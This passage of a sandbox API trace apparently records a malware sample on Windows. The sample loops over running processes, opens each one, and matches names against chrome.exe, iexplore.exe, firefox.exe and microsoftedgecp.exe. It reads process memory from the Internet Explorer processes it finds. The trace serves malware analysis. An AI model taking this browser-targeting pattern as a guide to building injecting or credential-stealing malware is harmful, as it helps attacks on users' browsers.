	[0204.196] GetModuleHandleA (lpModuleName="shell32.dll") returned 0x75bb0000
	[0204.196] StrStrIA (lpFirst="beam.exe", lpSrch="iexplore.exe") returned 0x0
	[0204.196] GetModuleHandleA (lpModuleName="shell32.dll") returned 0x75bb0000
	[0204.196] StrStrIA (lpFirst="beam.exe", lpSrch="firefox.exe") returned 0x0
	[0204.197] GetModuleHandleA (lpModuleName="shell32.dll") returned 0x75bb0000
	[0204.197] StrStrIA (lpFirst="beam.exe", lpSrch="microsoftedgecp.exe") returned 0x0
	[0204.197] Process32Next (in: hSnapshot=0x188, lppe=0x101f824 | out: lppe=0x101f824*(dwSize=0x128, cntUsage=0x0, th32ProcessID=0xb30, th32DefaultHeapID=0x0, th32ModuleID=0x0, cntThreads=0x2, th32ParentProcessID=0x61c, pcPriClassBase=8, dwFlags=0x0, szExeFile="configurations.exe")) returned 1
	[0204.198] OpenProcess (dwDesiredAccess=0x43b, bInheritHandle=0, dwProcessId=0xb30) returned 0x2858
	[0204.198] GetModuleHandleA (lpModuleName="shell32.dll") returned 0x75bb0000
	[0204.198] StrStrIA (lpFirst="configurations.exe", lpSrch="chrome.exe") returned 0x0
	[0204.198] GetModuleHandleA (lpModuleName="shell32.dll") returned 0x75bb0000
	[0204.198] StrStrIA (lpFirst="configurations.exe", lpSrch="iexplore.exe") returned 0x0
	[0204.199] GetModuleHandleA (lpModuleName="shell32.dll") returned 0x75bb0000
	[0204.199] StrStrIA (lpFirst="configurations.exe", lpSrch="firefox.exe") returned 0x0
	[0204.199] GetModuleHandleA (lpModuleName="shell32.dll") returned 0x75bb0000
	[0204.199] StrStrIA (lpFirst="configurations.exe", lpSrch="microsoftedgecp.exe") returned 0x0
	[0204.199] Process32Next (in: hSnapshot=0x188, lppe=0x101f824 | out: lppe=0x101f824*(dwSize=0x128, cntUsage=0x0, th32ProcessID=0xb40, th32DefaultHeapID=0x0, th32ModuleID=0x0, cntThreads=0x2, th32ParentProcessID=0x61c, pcPriClassBase=8, dwFlags=0x0, szExeFile="fact-film-anticipated.exe")) returned 1
	[0204.200] OpenProcess (dwDesiredAccess=0x43b, bInheritHandle=0, dwProcessId=0xb40) returned 0x285c
	[0204.200] GetModuleHandleA (lpModuleName="shell32.dll") returned 0x75bb0000
	[0204.200] StrStrIA (lpFirst="fact-film-anticipated.exe", lpSrch="chrome.exe") returned 0x0
	[0204.201] GetModuleHandleA (lpModuleName="shell32.dll") returned 0x75bb0000
	[0204.201] StrStrIA (lpFirst="fact-film-anticipated.exe", lpSrch="iexplore.exe") returned 0x0
	[0204.201] GetModuleHandleA (lpModuleName="shell32.dll") returned 0x75bb0000
	[0204.201] StrStrIA (lpFirst="fact-film-anticipated.exe", lpSrch="firefox.exe") returned 0x0
	[0204.202] GetModuleHandleA (lpModuleName="shell32.dll") returned 0x75bb0000
	[0204.202] StrStrIA (lpFirst="fact-film-anticipated.exe", lpSrch="microsoftedgecp.exe") returned 0x0
	[0204.202] Process32Next (in: hSnapshot=0x188, lppe=0x101f824 | out: lppe=0x101f824*(dwSize=0x128, cntUsage=0x0, th32ProcessID=0xb50, th32DefaultHeapID=0x0, th32ModuleID=0x0, cntThreads=0x2, th32ParentProcessID=0x61c, pcPriClassBase=8, dwFlags=0x0, szExeFile="wanting villages.exe")) returned 1
	[0204.203] OpenProcess (dwDesiredAccess=0x43b, bInheritHandle=0, dwProcessId=0xb50) returned 0x2860
	[0204.203] GetModuleHandleA (lpModuleName="shell32.dll") returned 0x75bb0000
	[0204.203] StrStrIA (lpFirst="wanting villages.exe", lpSrch="chrome.exe") returned 0x0
	[0204.204] GetModuleHandleA (lpModuleName="shell32.dll") returned 0x75bb0000
	[0204.204] StrStrIA (lpFirst="wanting villages.exe", lpSrch="iexplore.exe") returned 0x0
	[0204.204] GetModuleHandleA (lpModuleName="shell32.dll") returned 0x75bb0000
	[0204.204] StrStrIA (lpFirst="wanting villages.exe", lpSrch="firefox.exe") returned 0x0
	[0204.208] GetModuleHandleA (lpModuleName="shell32.dll") returned 0x75bb0000
	[0204.208] StrStrIA (lpFirst="wanting villages.exe", lpSrch="microsoftedgecp.exe") returned 0x0
	[0204.208] Process32Next (in: hSnapshot=0x188, lppe=0x101f824 | out: lppe=0x101f824*(dwSize=0x128, cntUsage=0x0, th32ProcessID=0xb60, th32DefaultHeapID=0x0, th32ModuleID=0x0, cntThreads=0x2, th32ParentProcessID=0x61c, pcPriClassBase=8, dwFlags=0x0, szExeFile="engagementresearchersmonkey.exe")) returned 1
	[0204.209] OpenProcess (dwDesiredAccess=0x43b, bInheritHandle=0, dwProcessId=0xb60) returned 0x2864
	[0204.209] GetModuleHandleA (lpModuleName="shell32.dll") returned 0x75bb0000
	[0204.209] StrStrIA (lpFirst="engagementresearchersmonkey.exe", lpSrch="chrome.exe") returned 0x0
	[0204.209] GetModuleHandleA (lpModuleName="shell32.dll") returned 0x75bb0000
	[0204.210] StrStrIA (lpFirst="engagementresearchersmonkey.exe", lpSrch="iexplore.exe") returned 0x0
	[0204.210] GetModuleHandleA (lpModuleName="shell32.dll") returned 0x75bb0000
	[0204.210] StrStrIA (lpFirst="engagementresearchersmonkey.exe", lpSrch="firefox.exe") returned 0x0
	[0204.211] GetModuleHandleA (lpModuleName="shell32.dll") returned 0x75bb0000
	[0204.211] StrStrIA (lpFirst="engagementresearchersmonkey.exe", lpSrch="microsoftedgecp.exe") returned 0x0
	[0204.211] Process32Next (in: hSnapshot=0x188, lppe=0x101f824 | out: lppe=0x101f824*(dwSize=0x128, cntUsage=0x0, th32ProcessID=0xb70, th32DefaultHeapID=0x0, th32ModuleID=0x0, cntThreads=0x2, th32ParentProcessID=0x61c, pcPriClassBase=8, dwFlags=0x0, szExeFile="surgical-marcus.exe")) returned 1
	[0204.212] OpenProcess (dwDesiredAccess=0x43b, bInheritHandle=0, dwProcessId=0xb70) returned 0x2868
	[0204.212] GetModuleHandleA (lpModuleName="shell32.dll") returned 0x75bb0000
	[0204.212] StrStrIA (lpFirst="surgical-marcus.exe", lpSrch="chrome.exe") returned 0x0
	[0204.213] GetModuleHandleA (lpModuleName="shell32.dll") returned 0x75bb0000
	[0204.213] StrStrIA (lpFirst="surgical-marcus.exe", lpSrch="iexplore.exe") returned 0x0
	[0204.213] GetModuleHandleA (lpModuleName="shell32.dll") returned 0x75bb0000
	[0204.213] StrStrIA (lpFirst="surgical-marcus.exe", lpSrch="firefox.exe") returned 0x0
	[0204.213] GetModuleHandleA (lpModuleName="shell32.dll") returned 0x75bb0000
	[0204.213] StrStrIA (lpFirst="surgical-marcus.exe", lpSrch="microsoftedgecp.exe") returned 0x0
	[0204.214] Process32Next (in: hSnapshot=0x188, lppe=0x101f824 | out: lppe=0x101f824*(dwSize=0x128, cntUsage=0x0, th32ProcessID=0xc38, th32DefaultHeapID=0x0, th32ModuleID=0x0, cntThreads=0xf, th32ParentProcessID=0xc0c, pcPriClassBase=8, dwFlags=0x0, szExeFile="iexplore.exe")) returned 1
	[0204.214] OpenProcess (dwDesiredAccess=0x43b, bInheritHandle=0, dwProcessId=0xc38) returned 0x286c
	[0204.215] GetModuleHandleA (lpModuleName="shell32.dll") returned 0x75bb0000
	[0204.215] StrStrIA (lpFirst="iexplore.exe", lpSrch="chrome.exe") returned 0x0
	[0204.215] GetModuleHandleA (lpModuleName="shell32.dll") returned 0x75bb0000
	[0204.215] StrStrIA (lpFirst="iexplore.exe", lpSrch="iexplore.exe") returned="iexplore.exe"
	[0204.215] GetModuleHandleA (lpModuleName="shell32.dll") returned 0x75bb0000
	[0204.215] StrStrIA (lpFirst="iexplore.exe", lpSrch="firefox.exe") returned 0x0
	[0204.215] GetModuleHandleA (lpModuleName="shell32.dll") returned 0x75bb0000
	[0204.215] StrStrIA (lpFirst="iexplore.exe", lpSrch="microsoftedgecp.exe") returned 0x0
	[0204.216] NtQueryInformationProcess (in: ProcessHandle=0x286c, ProcessInformationClass=0x0, ProcessInformation=0x101f2e4, ProcessInformationLength=0x18, ReturnLength=0x101f300 | out: ProcessInformation=0x101f2e4, ReturnLength=0x101f300) returned 0x0
	[0204.216] ReadProcessMemory (in: hProcess=0x286c, lpBaseAddress=0x7ffdb000, lpBuffer=0x101f0cc, nSize=0x1d8, lpNumberOfBytesRead=0x101f310 | out: lpBuffer=0x101f0cc*, lpNumberOfBytesRead=0x101f310*=0x1d8) returned 1
	[0204.216] ReadProcessMemory (in: hProcess=0x286c, lpBaseAddress=0x2b11c0, lpBuffer=0x101ee3c, nSize=0x290, lpNumberOfBytesRead=0x101f310 | out: lpBuffer=0x101ee3c*, lpNumberOfBytesRead=0x101f310*=0x290) returned 1
	[0204.216] ReadProcessMemory (in: hProcess=0x286c, lpBaseAddress=0x2b1998, lpBuffer=0x101f40c, nSize=0x20, lpNumberOfBytesRead=0x101f310 | out: lpBuffer=0x101f40c*, lpNumberOfBytesRead=0x101f310*=0x20) returned 1
	[0204.216] StrStrIW (lpFirst="Winsta0\\Default", lpSrch="default") returned="Default"
	[0204.216] Process32Next (in: hSnapshot=0x188, lppe=0x101f824 | out: lppe=0x101f824*(dwSize=0x128, cntUsage=0x0, th32ProcessID=0xc94, th32DefaultHeapID=0x0, th32ModuleID=0x0, cntThreads=0x13, th32ParentProcessID=0xc38, pcPriClassBase=8, dwFlags=0x0, szExeFile="iexplore.exe")) returned 1
	[0204.217] OpenProcess (dwDesiredAccess=0x43b, bInheritHandle=0, dwProcessId=0xc94) returned 0x2870
	[0204.217] GetModuleHandleA (lpModuleName="shell32.dll") returned 0x75bb0000
	[0204.217] StrStrIA (lpFirst="iexplore.exe", lpSrch="chrome.exe") returned 0x0
	[0204.217] GetModuleHandleA (lpModuleName="shell32.dll") returned 0x75bb0000
	[0204.217] StrStrIA (lpFirst="iexplore.exe", lpSrch="iexplore.exe") returned="iexplore.exe"
	[0204.217] GetModuleHandleA (lpModuleName="shell32.dll") returned 0x75bb0000
	[0204.218] StrStrIA (lpFirst="iexplore.exe", lpSrch="firefox.exe") returned 0x0
	[0204.218] GetModuleHandleA (lpModuleName="shell32.dll") returned 0x75bb0000
	[0204.218] StrStrIA (lpFirst="iexplore.exe", lpSrch="microsoftedgecp.exe") returned 0x0
	[0204.218] NtQueryInformationProcess (in: ProcessHandle=0x2870, ProcessInformationClass=0x0, ProcessInformation=0x101f2e4, ProcessInformationLength=0x18, ReturnLength=0x101f300 | out: ProcessInformation=0x101f2e4, ReturnLength=0x101f300) returned 0x0
	[0204.218] ReadProcessMemory (in: hProcess=0x2870, lpBaseAddress=0x7ffde000, lpBuffer=0x101f0cc, nSize=0x1d8, lpNumberOfBytesRead=0x101f310 | out: lpBuffer=0x101f0cc*, lpNumberOfBytesRead=0x101f310*=0x1d8) returned 1
	[0204.218] ReadProcessMemory (in: hProcess=0x2870, lpBaseAddress=0x911c0, lpBuffer=0x101ee3c, nSize=0x290, lpNumberOfBytesRead=0x101f310 | out: lpBuffer=0x101ee3c*, lpNumberOfBytesRead=0x101f310*=0x290) returned 1
	[0204.218] ReadProcessMemory (in: hProcess=0x2870, lpBaseAddress=0x919ba, lpBuffer=0x101f40c, nSize=0x20, lpNumberOfBytesRead=0x101f310 | out: lpBuffer=0x101f40c*, lpNumberOfBytesRead=0x101f310*=0x20) returned 1
	[0204.218] StrStrIW (lpFirst="Winsta0\\Default", lpSrch="default") returned="Default"
	[0204.219] Process32Next (in: hSnapshot=0x188, lppe=0x101f824 | out: lppe=0x101f824*(dwSize=0x128, cntUsage=0x0, th32ProcessID=0x914, th32DefaultHeapID=0x0, th32ModuleID=0x0, cntThreads=0x6, th32ParentProcessID=0x34c, pcPriClassBase=6, dwFlags=0x0, szExeFile="taskeng.exe")) returned 1
	[0204.219] OpenProcess (dwDesiredAccess=0x43b, bInheritHandle=0, dwProcessId=0x914) returned 0x2874
	[0204.219] GetModuleHandleA (lpModuleName="shell32.dll") returned 0x75bb0000
	[0204.219] StrStrIA (lpFirst="taskeng.exe", lpSrch="chrome.exe") returned 0x0
	[0204.220] GetModuleHandleA (lpModuleName="shell32.dll") returned 0x75bb0000
	[0204.220] StrStrIA (lpFirst="taskeng.exe", lpSrch="iexplore.exe") returned 0x0
	[0204.220] GetModuleHandleA (lpModuleName="shell32.dll") returned 0x75bb0000
	[0204.220] StrStrIA (lpFirst="taskeng.exe", lpSrch="firefox.exe") returned 0x0
	[0204.220] GetModuleHandleA (lpModuleName="shell32.dll") returned 0x75bb0000
	[0204.220] StrStrIA (lpFirst="taskeng.exe", lpSrch="microsoftedgecp.exe") returned 0x0
	[0204.221] Process32Next (in: hSnapshot=0x188, lppe=0x101f824 | out: lppe=0x101f824*(dwSize=0x128, cntUsage=0x0, th32ProcessID=0x214, th32DefaultHeapID=0x0, th32ModuleID=0x0, cntThreads=0x8, th32ParentProcessID=0x914, pcPriClassBase=6, dwFlags=0x0, szExeFile="tadiapce.exe")) returned 1
	[0204.221] OpenProcess (dwDesiredAccess=0x43b, bInheritHandle=0, dwProcessId=0x214) returned 0x2878
	[0204.221] GetModuleHandleA (lpModuleName="shell32.dll") returned 0x75bb0000
	[0204.221] StrStrIA (lpFirst="tadiapce.exe", lpSrch="chrome.exe") returned 0x0
	[0204.222] GetModuleHandleA (lpModuleName="shell32.dll") returned 0x75bb0000
	[0204.222] StrStrIA (lpFirst="tadiapce.exe", lpSrch="iexplore.exe") returned 0x0
	[0204.222] GetModuleHandleA (lpModuleName="shell32.dll") returned 0x75bb0000
	[0204.222] StrStrIA (lpFirst="tadiapce.exe", lpSrch="firefox.exe") returned 0x0
	[0204.222] GetModuleHandleA (lpModuleName="shell32.dll") returned 0x75bb0000
	[0204.223] StrStrIA (lpFirst="tadiapce.exe", lpSrch="microsoftedgecp.exe") returned 0x0
	[0204.223] Process32Next (in: hSnapshot=0x188, lppe=0x101f824 | out: lppe=0x101f824*(dwSize=0x128, cntUsage=0x0, th32ProcessID=0xaa8, th32DefaultHeapID=0x0, th32ModuleID=0x0, cntThreads=0x5, th32ParentProcessID=0x1d8, pcPriClassBase=8, dwFlags=0x0, szExeFile="svchost.exe")) returned 1
	[0204.223] OpenProcess (dwDesiredAccess=0x43b, bInheritHandle=0, dwProcessId=0xaa8) returned 0x287c
	[0204.223] GetModuleHandleA (lpModuleName="shell32.dll") returned 0x75bb0000
	[0204.224] StrStrIA (lpFirst="svchost.exe", lpSrch="chrome.exe") returned 0x0
	[0204.224] GetModuleHandleA (lpModuleName="shell32.dll") returned 0x75bb0000
	[0204.224] StrStrIA (lpFirst="svchost.exe", lpSrch="iexplore.exe") returned 0x0
	[0204.224] GetModuleHandleA (lpModuleName="shell32.dll") returned 0x75bb0000
	[0204.224] StrStrIA (lpFirst="svchost.exe", lpSrch="firefox.exe") returned 0x0
	[0204.225] GetModuleHandleA (lpModuleName="shell32.dll") returned 0x75bb0000
	[0204.225] StrStrIA (lpFirst="svchost.exe", lpSrch="microsoftedgecp.exe") returned 0x0
	[0204.225] Process32Next (in: hSnapshot=0x188, lppe=0x101f824 | out: lppe=0x101f824*(dwSize=0x128, cntUsage=0x0, th32ProcessID=0x110, th32DefaultHeapID=0x0, th32ModuleID=0x0, cntThreads=0x7, th32ParentProcessID=0x214, pcPriClassBase=6, dwFlags=0x0, szExeFile="svchost.exe")) returned 1
	[0204.225] Process32Next (in: hSnapshot=0x188, lppe=0x101f824 | out: lppe=0x101f824*(dwSize=0x128, cntUsage=0x0, th32ProcessID=0x6d8, th32DefaultHeapID=0x0, th32ModuleID=0x0, cntThreads=0x3, th32ParentProcessID=0x214, pcPriClassBase=8, dwFlags=0x0, szExeFile="svchost.exe")) returned 1
	[0204.226] OpenProcess (dwDesiredAccess=0x43b, bInheritHandle=0, dwProcessId=0x6d8) returned 0x2880
	[0204.226] GetModuleHandleA (lpModuleName="shell32.dll") returned 0x75bb0000
	[0204.226] StrStrIA (lpFirst="svchost.exe", lpSrch="chrome.exe") returned 0x0
	[0204.227] GetModuleHandleA (lpModuleName="shell32.dll") returned 0x75bb0000
	[0204.227] StrStrIA (lpFirst="svchost.exe", lpSrch="iexplore.exe") returned 0x0
	[0204.227] GetModuleHandleA (lpModuleName="shell32.dll") returned 0x75bb0000
	[0204.227] StrStrIA (lpFirst="svchost.exe", lpSrch="firefox.exe") returned 0x0
	[0204.227] GetModuleHandleA (lpModuleName="shell32.dll") returned 0x75bb0000
	[0204.227] StrStrIA (lpFirst="svchost.exe", lpSrch="microsoftedgecp.exe") returned 0x0
	[0204.227] Process32Next (in: hSnapshot=0x188, lppe=0x101f824 | out: lppe=0x101f824*(dwSize=0x128, cntUsage=0x0, th32ProcessID=0x6d8, th32DefaultHeapID=0x0, th32ModuleID=0x0, cntThreads=0x3, th32ParentProcessID=0x214, pcPriClassBase=8, dwFlags=0x0, szExeFile="svchost.exe")) returned 0
	[0204.228] CloseHandle (hObject=0x188) returned 1
	[0204.228] Sleep (dwMilliseconds=0x64) 
	[0204.330] GetCurrentProcessId () returned 0x110
	[0204.330] CreateToolhelp32Snapshot (dwFlags=0x2, th32ProcessID=0x0) returned 0x188
	[0204.333] Process32First (in: hSnapshot=0x188, lppe=0x101f824 | out: lppe=0x101f824*(dwSize=0x128, cntUsage=0x0, th32ProcessID=0x0, th32DefaultHeapID=0x0, th32ModuleID=0x0, cntThreads=0x1, th32ParentProcessID=0x0, pcPriClassBase=0, dwFlags=0x0, szExeFile="[System Process]")) returned 1
	[0204.334] Process32Next (in: hSnapshot=0x188, lppe=0x101f824 | out: lppe=0x101f824*(dwSize=0x128, cntUsage=0x0, th32ProcessID=0x4, th32DefaultHeapID=0x0, th32ModuleID=0x0, cntThreads=0x51, th32ParentProcessID=0x0, pcPriClassBase=8, dwFlags=0x0, szExeFile="System")) returned 1
	[0204.335] Process32Next (in: hSnapshot=0x188, lppe=0x101f824 | out: lppe=0x101f824*(dwSize=0x128, cntUsage=0x0, th32ProcessID=0x104, th32DefaultHeapID=0x0, th32ModuleID=0x0, cntThreads=0x2, th32ParentProcessID=0x4, pcPriClassBase=11, dwFlags=0x0, szExeFile="smss.exe")) returned 1
	[0204.336] OpenProcess (dwDesiredAccess=0x43b, bInheritHandle=0, dwProcessId=0x104) returned 0x2884
	[0204.336] GetModuleHandleA (lpModuleName="shell32.dll") returned 0x75bb0000
	[0204.336] StrStrIA (lpFirst="smss.exe", lpSrch="chrome.exe") returned 0x0
	[0204.336] GetModuleHandleA (lpModuleName="shell32.dll") returned 0x75bb0000
	[0204.336] StrStrIA (lpFirst="smss.exe", lpSrch="iexplore.exe") returned 0x0
	[0204.337] GetModuleHandleA (lpModuleName="shell32.dll") returned 0x75bb0000
	[0204.337] StrStrIA (lpFirst="smss.exe", lpSrch="firefox.exe") returned 0x0
	[0204.337] GetModuleHandleA (lpModuleName="shell32.dll") returned 0x75bb0000
	[0204.337] StrStrIA (lpFirst="smss.exe", lpSrch="microsoftedgecp.exe") returned 0x0
	[0204.338] Process32Next (in: hSnapshot=0x188, lppe=0x101f824 | out: lppe=0x101f824*(dwSize=0x128, cntUsage=0x0, th32ProcessID=0x148, th32DefaultHeapID=0x0, th32ModuleID=0x0, cntThreads=0x8, th32ParentProcessID=0x140, pcPriClassBase=13, dwFlags=0x0, szExeFile="csrss.exe")) returned 1
	[0204.339] OpenProcess (dwDesiredAccess=0x43b, bInheritHandle=0, dwProcessId=0x148) returned 0x2888
	[0204.339] GetModuleHandleA (lpModuleName="shell32.dll") returned 0x75bb0000
	[0204.339] StrStrIA (lpFirst="csrss.exe", lpSrch="chrome.exe") returned 0x0
	[0204.339] GetModuleHandleA (lpModuleName="shell32.dll") returned 0x75bb0000
	[0204.339] StrStrIA (lpFirst="csrss.exe", lpSrch="iexplore.exe") returned 0x0
	[0204.340] GetModuleHandleA (lpModuleName="shell32.dll") returned 0x75bb0000
	[0204.340] StrStrIA (lpFirst="csrss.exe", lpSrch="firefox.exe") returned 0x0
	[0204.340] GetModuleHandleA (lpModuleName="shell32.dll") returned 0x75bb0000
	[0204.340] StrStrIA (lpFirst="csrss.exe", lpSrch="microsoftedgecp.exe") returned 0x0
	[0204.340] Process32Next (in: hSnapshot=0x188, lppe=0x101f824 | out: lppe=0x101f824*(dwSize=0x128, cntUsage=0x0, th32ProcessID=0x178, th32DefaultHeapID=0x0, th32ModuleID=0x0, cntThreads=0x3, th32ParentProcessID=0x140, pcPriClassBase=13, dwFlags=0x0, szExeFile="wininit.exe")) returned 1
	[0204.341] OpenProcess (dwDesiredAccess=0x43b, bInheritHandle=0, dwProcessId=0x178) returned 0x288c
	[0204.342] GetModuleHandleA (lpModuleName="shell32.dll") returned 0x75bb0000
	[0204.342] StrStrIA (lpFirst="wininit.exe", lpSrch="chrome.exe") returned 0x0
	[0204.342] GetModuleHandleA (lpModuleName="shell32.dll") returned 0x75bb0000
	[0204.342] StrStrIA (lpFirst="wininit.exe", lpSrch="iexplore.exe") returned 0x0
	[0204.343] GetModuleHandleA (lpModuleName="shell32.dll") returned 0x75bb0000
	[0204.343] StrStrIA (lpFirst="wininit.exe", lpSrch="firefox.exe") returned 0x0
	[0204.343] GetModuleHandleA (lpModuleName="shell32.dll") returned 0x75bb0000
	[0204.343] StrStrIA (lpFirst="wininit.exe", lpSrch="microsoftedgecp.exe") returned 0x0
	[0204.343] Process32Next (in: hSnapshot=0x188, lppe=0x101f824 | out: lppe=0x101f824*(dwSize=0x128, cntUsage=0x0, th32ProcessID=0x184, th32DefaultHeapID=0x0, th32ModuleID=0x0, cntThreads=0x8, th32ParentProcessID=0x170, pcPriClassBase=13, dwFlags=0x0, szExeFile="csrss.exe")) returned 1
	[0204.344] OpenProcess (dwDesiredAccess=0x43b, bInheritHandle=0, dwProcessId=0x184) returned 0x2890
	[0204.345] GetModuleHandleA (lpModuleName="shell32.dll") returned 0x75bb0000
	[0204.345] StrStrIA (lpFirst="csrss.exe", lpSrch="chrome.exe") returned 0x0
	[0204.345] GetModuleHandleA (lpModuleName="shell32.dll") returned 0x75bb0000
	[0204.345] StrStrIA (lpFirst="csrss.exe", lpSrch="iexplore.exe") returned 0x0
	[0204.346] GetModuleHandleA (lpModuleName="shell32.dll") returned 0x75bb0000
	[0204.346] StrStrIA (lpFirst="csrss.exe", lpSrch="firefox.exe") returned 0x0
	[0204.346] GetModuleHandleA (lpModuleName="shell32.dll") returned 0x75bb0000
	[0204.346] StrStrIA (lpFirst="csrss.exe", lpSrch="microsoftedgecp.exe") returned 0x0
	[0204.346] Process32Next (in: hSnapshot=0x188, lppe=0x101f824 | out: lppe=0x101f824*(dwSize=0x128, cntUsage=0x0, th32ProcessID=0x1ac, th32DefaultHeapID=0x0, th32ModuleID=0x0, cntThreads=0x4, th32ParentProcessID=0x170, pcPriClassBase=13, dwFlags=0x0, szExeFile="winlogon.exe")) returned 1
	[0204.347] OpenProcess (dwDesiredAccess=0x43b, bInheritHandle=0, dwProcessId=0x1ac) returned 0x2894
	[0204.347] GetModuleHandleA (lpModuleName="shell32.dll") returned 0x75bb0000
	[0204.347] StrStrIA (lpFirst="winlogon.exe", lpSrch="chrome.exe") returned 0x0
	[0204.347] GetModuleHandleA (lpModuleName="shell32.dll") returned 0x75bb0000
	[0204.347] StrStrIA (lpFirst="winlogon.exe", lpSrch="iexplore.exe") returned 0x0
	[0204.348] GetModuleHandleA (lpModuleName="shell32.dll") returned 0x75bb0000
	[0204.348] StrStrIA (lpFirst="winlogon.exe", lpSrch="firefox.exe") returned 0x0
	[0204.348] GetModuleHandleA (lpModuleName="shell32.dll") returned 0x75bb0000
	[0204.348] StrStrIA (lpFirst="winlogon.exe", lpSrch="microsoftedgecp.exe") returned 0x0
	[0204.348] Process32Next (in: hSnapshot=0x188, lppe=0x101f824 | out: lppe=0x101f824*(dwSize=0x128, cntUsage=0x0, th32ProcessID=0x1d8, th32DefaultHeapID=0x0, th32ModuleID=0x0, cntThreads=0xa, th32ParentProcessID=0x178, pcPriClassBase=9, dwFlags=0x0, szExeFile="services.exe")) returned 1
	[0204.349] OpenProcess (dwDesiredAccess=0x43b, bInheritHandle=0, dwProcessId=0x1d8) returned 0x2898
	[0204.349] GetModuleHandleA (lpModuleName="shell32.dll") returned 0x75bb0000
	[0204.349] StrStrIA (lpFirst="services.exe", lpSrch="chrome.exe") returned 0x0
	[0204.349] GetModuleHandleA (lpModuleName="shell32.dll") returned 0x75bb0000
	[0204.349] StrStrIA (lpFirst="services.exe", lpSrch="iexplore.exe") returned 0x0
	[0204.350] GetModuleHandleA (lpModuleName="shell32.dll") returned 0x75bb0000
	[0204.350] StrStrIA (lpFirst="services.exe", lpSrch="firefox.exe") returned 0x0
	[0204.350] GetModuleHandleA (lpModuleName="shell32.dll") returned 0x75bb0000
	[0204.350] StrStrIA (lpFirst="services.exe", lpSrch="microsoftedgecp.exe") returned 0x0
	[0204.350] Process32Next (in: hSnapshot=0x188, lppe=0x101f824 | out: lppe=0x101f824*(dwSize=0x128, cntUsage=0x0, th32ProcessID=0x1e0, th32DefaultHeapID=0x0, th32ModuleID=0x0, cntThreads=0x8, th32ParentProcessID=0x178, pcPriClassBase=9, dwFlags=0x0, szExeFile="lsass.exe")) returned 1
	[0204.351] OpenProcess (dwDesiredAccess=0x43b, bInheritHandle=0, dwProcessId=0x1e0) returned 0x289c
	[0204.351] GetModuleHandleA (lpModuleName="shell32.dll") returned 0x75bb0000
	[0204.351] StrStrIA (lpFirst="lsass.exe", lpSrch="chrome.exe") returned 0x0
	[0204.351] GetModuleHandleA (lpModuleName="shell32.dll") returned 0x75bb0000
	[0204.351] StrStrIA (lpFirst="lsass.exe", lpSrch="iexplore.exe") returned 0x0
	[0204.352] GetModuleHandleA (lpModuleName="shell32.dll") returned 0x75bb0000
	[0204.352] StrStrIA (lpFirst="lsass.exe", lpSrch="firefox.exe") returned 0x0
	[0204.352] GetModuleHandleA (lpModuleName="shell32.dll") returned 0x75bb0000
	[0204.352] StrStrIA (lpFirst="lsass.exe", lpSrch="microsoftedgecp.exe") returned 0x0
	[0204.352] Process32Next (in: hSnapshot=0x188, lppe=0x101f824 | out: lppe=0x101f824*(dwSize=0x128, cntUsage=0x0, th32ProcessID=0x1e8, th32DefaultHeapID=0x0, th32ModuleID=0x0, cntThreads=0xa, th32ParentProcessID=0x178, pcPriClassBase=8, dwFlags=0x0, szExeFile="lsm.exe")) returned 1
	[0204.353] OpenProcess (dwDesiredAccess=0x43b, bInheritHandle=0, dwProcessId=0x1e8) returned 0x28a0
	[0204.353] GetModuleHandleA (lpModuleName="shell32.dll") returned 0x75bb0000
	[0204.353] StrStrIA (lpFirst="lsm.exe", lpSrch="chrome.exe") returned 0x0
	[0204.353] GetModuleHandleA (lpModuleName="shell32.dll") returned 0x75bb0000
	[0204.353] StrStrIA (lpFirst="lsm.exe", lpSrch="iexplore.exe") returned 0x0
	[0204.354] GetModuleHandleA (lpModuleName="shell32.dll") returned 0x75bb0000
	[0204.354] StrStrIA (lpFirst="lsm.exe", lpSrch="firefox.exe") returned 0x0
	[0204.354] GetModuleHandleA (lpModuleName="shell32.dll") returned 0x75bb0000
	[0204.354] StrStrIA (lpFirst="lsm.exe", lpSrch="microsoftedgecp.exe") returned 0x0
	[0204.354] Process32Next (in: hSnapshot=0x188, lppe=0x101f824 | out: lppe=0x101f824*(dwSize=0x128, cntUsage=0x0, th32ProcessID=0x250, th32DefaultHeapID=0x0, th32ModuleID=0x0, cntThreads=0xa, th32ParentProcessID=0x1d8, pcPriClassBase=8, dwFlags=0x0, szExeFile="svchost.exe")) returned 1
	[0204.355] OpenProcess (dwDesiredAccess=0x43b, bInheritHandle=0, dwProcessId=0x250) returned 0x28a4
	[0204.355] GetModuleHandleA (lpModuleName="shell32.dll") returned 0x75bb0000
	[0204.355] StrStrIA (lpFirst="svchost.exe", lpSrch="chrome.exe") returned 0x0
	[0204.355] GetModuleHandleA (lpModuleName="shell32.dll") returned 0x75bb0000
	[0204.355] StrStrIA (lpFirst="svchost.exe", lpSrch="iexplore.exe") returned 0x0
	[0204.355] GetModuleHandleA (lpModuleName="shell32.dll") returned 0x75bb0000
	[0204.356] StrStrIA (lpFirst="svchost.exe", lpSrch="firefox.exe") returned 0x0
	[0204.356] GetModuleHandleA (lpModuleName="shell32.dll") returned 0x75bb0000
	[0204.356] StrStrIA (lpFirst="svchost.exe", lpSrch="microsoftedgecp.exe") returned 0x0
	[0204.356] Process32Next (in: hSnapshot=0x188, lppe=0x101f824 | out: lppe=0x101f824*(dwSize=0x128, cntUsage=0x0, th32ProcessID=0x290, th32DefaultHeapID=0x0, th32ModuleID=0x0, cntThreads=0x8, th32ParentProcessID=0x1d8, pcPriClassBase=8, dwFlags=0x0, szExeFile="svchost.exe")) returned 1
	[0204.357] OpenProcess (dwDesiredAccess=0x43b, bInheritHandle=0, dwProcessId=0x290) returned 0x28a8
	[0204.357] GetModuleHandleA (lpModuleName="shell32.dll") returned 0x75bb0000
	[0204.357] StrStrIA (lpFirst="svchost.exe", lpSrch="chrome.exe") returned 0x0
	[0204.357] GetModuleHandleA (lpModuleName="shell32.dll") returned 0x75bb0000
	[0204.357] StrStrIA (lpFirst="svchost.exe", lpSrch="iexplore.exe") returned 0x0
	[0204.358] GetModuleHandleA (lpModuleName="shell32.dll") returned 0x75bb0000
	[0204.358] StrStrIA (lpFirst="svchost.exe", lpSrch="firefox.exe") returned 0x0
	[0204.358] GetModuleHandleA (lpModuleName="shell32.dll") returned 0x75bb0000
	[0204.358] StrStrIA (lpFirst="svchost.exe", lpSrch="microsoftedgecp.exe") returned 0x0
